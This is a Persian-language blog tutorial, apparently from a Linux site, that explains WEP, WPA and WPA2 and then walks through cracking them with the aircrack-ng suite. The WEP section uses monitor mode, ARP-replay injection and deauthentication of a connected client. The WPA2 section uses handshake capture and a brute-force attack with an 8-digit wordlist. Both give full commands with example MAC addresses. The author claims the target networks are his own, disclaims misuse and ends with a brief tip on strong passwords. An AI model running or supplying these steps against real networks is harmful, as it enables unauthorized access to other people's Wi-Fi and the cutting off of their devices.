رمز گشایی انواع پروتکل های وای فای

//رمز گشایی انواع پروتکل های وای فای

رمز گشایی انواع پروتکل های وای فای

امروز قصد دارم براتون امنیت انواع پروتکل های مودم (WEP/WPA/WPA2) را بررسی کنم و ببینید رمز و تنظیماتی که برای مودم ثبت می کنید چقدر در امنیت آن نقش مهمی ایفا می کند در ابتدا به سراغ WEP می رویم توضیح کوتاهی درباره این پروتکل بدم:

WEP Wired Equivalent Privacy

 

WEP یا «امنیت مشابه با شبکه‌های با سیم» پر استفاده ترین الگوریتم امنیتی در جهان به شمار می‌رود. دلیل چنین اتفاقی قابلیت Backward Compatibility (سازگاری با شرایط قدیمی تر) و البته این نکته است که WEP اولین گزینه در فهرست روبه روی کاربران برای برقراری یک رمز است. اولین بار در سپتامبر سال ۱۹۹۹ بود که WEP به عنوان یک استاندارد امنیتی WiFi شناخته شد باوجود باز نگری در این الگوریتم و معرفی حالت ۲۵۶ بیتی، نقص‌ها و ایرادات متعددی در استاندارد WEP کشف شد و بعد تر نیز با افزایش قدرت محاسباتی رایانه‌ها، عبور کردن از WEP آسان تر از قبل شد. در سال ۲۰۰۵ بود که FBI برای آگاه سازی کاربران از ضعف‌های WEP نمایشی عمومی برگزار کرد که در آن به کمک نرم افزارهای رایگان، تنها در عرض کمتر از یک دقیقه رمزهای WEP شکسته می‌شد. در حال حاضر نیز با وجود بهبودهای صورت گرفته، باز هم WEP به شدت آسیب پذیر بوده و به همین دلیل در سال ۲۰۰۴ این روش بازنشسته اعلام شد ولی متاسفانه هنوز افرادی هستند که از این رمز نگاری استفاده می کنند در ادامه به شما نشون میدم که چگونه رمز این نوع پروتکل به راحتی شکسته می شود.

ابتدا ترمینال را فراخوانی می کنیم و با دستور airmon-ng نام اینترفیس شبکه را می بینیم: (در اینجا اینترفیس خود را به یاد داشته باشید مال ما در اینجا wlan0 می باشد)

در طول آموزش هیچ ترمینالی را نبندید

airmon-ng

همانطور که مشاهده کردید اینترفیس ما در بالا wlan0 می باشد و حالا ما باید موقت سیستم را به حالت مانیتورینگ برای اسکن شبکه ببریم با دستور زیر:

airmon-ng start (interface)

airmon-ng start wlan0

در عکس بالا با دستوری که زدیم شبکه را به حالت مانیتورینگ بردیم و اینترفیس ما به اسم wlan0mon تغییر کرد(دقت کنید) و حالا با دستور زیر شبکه را اسکن می کنیم:

airodump-ng (interface)

airodump-ng wlan0mon

در بالا شبکه ی خودم که jim می باشد را به حالت wep بردم و تست را بر روی آن شروع می کنم تا ببینید این پروتکل چقدر ضعیف می باشد (دوستان خواهش می کنم استفاده نادرست از این پست نکنید بنده فقط جهت افزودن دانش و نشان دادن اینکه این پروتکل چقدر در راستای امنیت ضعیف می باشد این مطلب را به اشتراک گذاشتم) و حالا با دستور زیر شبکه خودمون را باز می کنیم:

airodump-ng -w (mitonid esme shabakatono benevisid) - -bssid (bssid shabakaton) - -channel (channel shabakaton) (interface)

airodump-ng -w jim - -bssid F4:3E:61:A6:57:88 - -channel 11 wlan0mon

در بالای جز‌يیات شبکه من را می ببینید در پایین یک BSSID می بینید که همونطور می دونید مک ادرس مودم می باشد و در کنار آن یک STATION قرار دارد که افرادی به مودم وصل شدن را نشان می دهد 🙂 قشنگ شد نه؟!

pwr: در کل فاصله وقدرت سیگنال مودم در بالا و در پایین (در STATION) فاصله گوشی یا کامپیوتر فرد را به ما نشان می دهد

ch: شماره کانال را نشان می دهد

ESSID: نام شبکه را نشان می دهد

BSSID: شماره وای فای (مک مودم) را نشان میدهد

#DATA: خب این خیلی مهم این قسمت ترافیک داده بین دیواس و مودم تارگتمونو نشان می دهد (خیلی مهم)

برای رمزگشایی این پروتکل باید دیتا را حداقل به ۲۰.۰۰۰ برسانیم برای اینکار فرد (تارگت) باید با مودمش کار کنه تا ترافیک بین دیواس و کودم بالا بره و ما شنود کنیم خب اگه نکنه چی؟! شاید تا شب طول بکشه نه؟! من برای اینم هم روش دارم جای تارگت خودمون بهش ترافیک میدیم 🙂 با دستور زیر ابتدا پاکت ها را آماده حمله می کنیم:

aireplay-ng -3 -b (bssid modem) -h (ip mac target dar station) (interface)

aireplay-ng -3 -b F4:3E:61:A6:57:88 -h EC:9B:F3:7F:01:C9 wlan0mon

و حالا ما درحال ارسال پکت می باشیم (دقت کنید نام این ترمینال میزارم ترمینال۱) ولی چون تارگت به مودم وصل هست پکت ها منتظرن که تارگت قطع شه و ما جای اون پکت بفرستیم برای قطع کردن ارتباط تارگت با مودم با دستور زیر :

aireplay-ng -0 10 -a (bssid modem) -h ( ip mac targetemon ) (interface)

aireplay-ng -0 10 -a F4:3E:61:A6:57:88 -h EC:9B:F3:7F:01:C9 wlan0mon

تا شما این دستور را میزنید ترمینال شماره یک که بهتون گفته بود سریعا پکت ها را به مودم ارسال می کند و ترافیک ما را بالا میبرد عکس ترمینال یک بعد از دستور بالایی:

خب صبر می کنیم DATA مون به ۲۰.۰۰۰ تا برسه تا راحت تر رمزگشایی کنیم :

خب دیگه کارمون به پایان رسیده فقط رمزگشایی مونده ترمینال جدید باز کنید و با دستور :

aircrack-ng (addrese fili ke aval kare tain kardim)

یادتونه بالا اسم تعیین کردین برای فایلتون من زده بودم jim مسیرش در HOME می باشد.

خب می تونیم فایل را بگیرید بندازید تو ترمینال تا آدرس خودش بنویسه یا دستی بنویسید:

aircrack-ng root/jim-01.cap

خب تموم شد و رمز و برامون نشون داد و بطور مثال رمز همیشه به این صورت نشون میده ۱۲:۲۳:۴۵:۵۵:۳۴ شما خودتون نقطه چین های وسطو بردارین ۱۲۲۳۴۵۵۵۳۴ در کل دیدن در ۲ ثانیه رمزگشایی کرد و چقدر مشکل در این پروتکل وجود دارد.

و حالا سراغ WPA/WPA2 میریم این دو نوع امنیت بیشتری در مقابل WEP دارن یک توضیح هم درباره این دو بگم:

WPA WiFi Protected Access

دسترسی حفاظت شده به WiFi یا همان WPA یک سال پیش از بازنشستگی WEP و برای جایگزینی آن ارائه شد. پر کاربردترین ساختار استفاده از WPA را می توان WPA-PSK نامید که توسط آن می توان بین ۸ تا ۶۳ کاراکتر ASCII را به عنوان رمز در نظر گرفت. کلیدهای استفاده شده توسط WPA به صورت ۲۵۶ بیتی بوده که پیشرفت چشمگیری نسبت به حالت‌های ۶۴ و ۱۲۸ بیتی WEP به حساب می‌آیند. برخی از مهم‌ترین تغییرات صورت گرفته توسط WPA عبارتند از بررسی یکپارچگی پیام برای مشخص کردن اینکه آیا مهاجمی توانسته بسته‌های اطلاعاتی رد و بدل شده بین access point و client را تصاحب کند یا خیر و پروتکل یکپارچگی کلیدهای موقت (TKIP). البته بعدتر TKIP با استاندارد رمزنگاری پیشرفته یا AES جایگزین شد. با وجود اینکه WPA برای راحت کردن خیال کاربران و خلاص شدن از WEP طراحی شده بود، اما به دلیل اینکه به وسیله به‌روزرسانی‌های firmware روی دستگاه‌های دارای WEP ارائه می‌شد، باید عناصر مشخصی از آن را تغییر می‌داد که همین موارد در نهایت باعث آسیب پذیری آن می‌شدند. پس از مدتی WPA هم به سرنوشت WEP دچار شد و نمایشی عمومی برای اثبات آسیب پذیری آن اجرا شد.

WPA2 WiFi Protected Access II

در سال ۲۰۰۶ بود که WPA با WPA2 جایگزین شد. یکی از بزرگ ترین تغییرات صورت گرفته در این جایگزینی، استفاده اجباری از الگوریتم‌های AES و همچنین معرفی CCMP (حالت ضد رمز به همراه پروتکل کد اعتبارسنجی پیام تغییر بلوک) به عنوان جایگزینی برای TKIP بود. در حال حاضر استفاده از WPA2 برای کاربران خانگی تقریبا بدون نقطه ضعف بزرگ بوده و عمده نگرانی‌های پیرامون آن به امنیت بخش‌های تجاری مربوط می‌شود. متاسفانه بزرگ ترین نگرانی‌های موجود در WPA همچنان در WPA2 هم حاضرند و با وجود اینکه شکستن دیوار ایجاد شده توسط WPA2 به زمانی بین ۲ تا ۱۲ ساعت کار مداوم در یک رایانه حرفه ای نیاز دارد، اما باز هم ضرورت بازنگری و برطرف کردن حفره‌های امنیتی در آن احساس می‌شود.

و رمزگشایی این دو نوع شبیه هم بود و باید حمله بروت فرس و یا حمله دیکشنری زد …

خب مانند بالا دستورات را اجرا می کنیم

airmon-ng

airmon-ng start (interface)

airodump-ng (interface)

خب تو اینجا این یکی مودمونو مورد حمله قرار میدیم همانطور مشاهده می کنید از قوی ترین پروتکل یعنی WPA2 استفاده می کند ولی در جلوتر می بینید که رمز ضعیف می تونه این پروتکل هم به خطر بندازه

airodump-ng -w (harchi khastit mitonid benevsid) - -bssid (bssid modem) - -channel (channel modem) (interface)

airodump-ng -w ehsan - -bssid 28:28:5D:AE:99:00 - -channel 10 wlan0mon 

در اینجا همانطور که در مبحث WEP توضیح دادم می باشد با این تفاوت که در اینجا ما دیگر احتیاجی به DATA نداریم چون این پروتکل ها نقاط ضعف WEP را ندارد و نمی توان ترافیک را تفکیک کرد و رمز را در اورد ما در اینجا باید تارگت را از مودم بیرون بندازیم بوسیله دستور زیر تا دوباره وصل شود و به ما به اصطلاح Handshake بدهد

aireplay-ng -0 10 -a (bssid modem) -h (ip mac target dar station) (interface)

aireplay-ng -0 10 -a 8:28:5D:AE:99:00 -h 58:C5:CB:DA:B8:05 wlan0mon

خب اگر به ترمینال دومی بریم میبینیم HANDSHAKE گرفتیم

خب تموم شد 🙂 میریم سراغ حمله بروت فرس در این نوع حمله بعنوان مثال ما مودم را از ۰۰۰۰۰۰۰۰ تا ۹۹۹۹۹۹۹۹ تست می کنیم تا ببینیم رمز مودم در این ارقام هست یا خیر که زمان بر نیز می باشد یا حمله دیکشنری بعنوان مثال شما اعداد و حرف هایی که تارگت برای مودم خود گذاشته است را حدس میزنید ولی ما در اینجا حمله بروت فرس می کنیم وآموزش ساختشم این پایین میزارم این فایل از ۰ تا ۹ عداد ۸ رقمی تست می کند و در ۶۰ در صد مواقع به جواب میرسیم با دستور زیر شروع می کنیم:

aircrack-ng -w (mahale file porotforce ro mizanim) )(va name file handshake)

aircrack-ng -w '/root/Desktop/list.txt' ehsan-01.cap

آموزش ساخت Wordlist کلیک کنید

همانطور که در بالا می بینید قوی ترین پروتکل ها هم با رمز های ضعیف قابل شکستن هستن و سعی کنید از حرف و اعداد بالا (۱۲رقمی) استفاده کنید.

 

P30LINUX.COM

توسط |۱۳۹۷/۷/۱ ۱۵:۱۷:۵۴شهریور ۲۰ام, ۱۳۹۷|Linux|بدون ديدگاه

درباره نویسنده :

Ehsan
احسان هستم دانشجوی آی تی علاقه ی زیادی به امنیت شبکه دارم امیدوارم بتونم مطالب مفیدی با شما به اشتراک بزارم

ثبت ديدگاه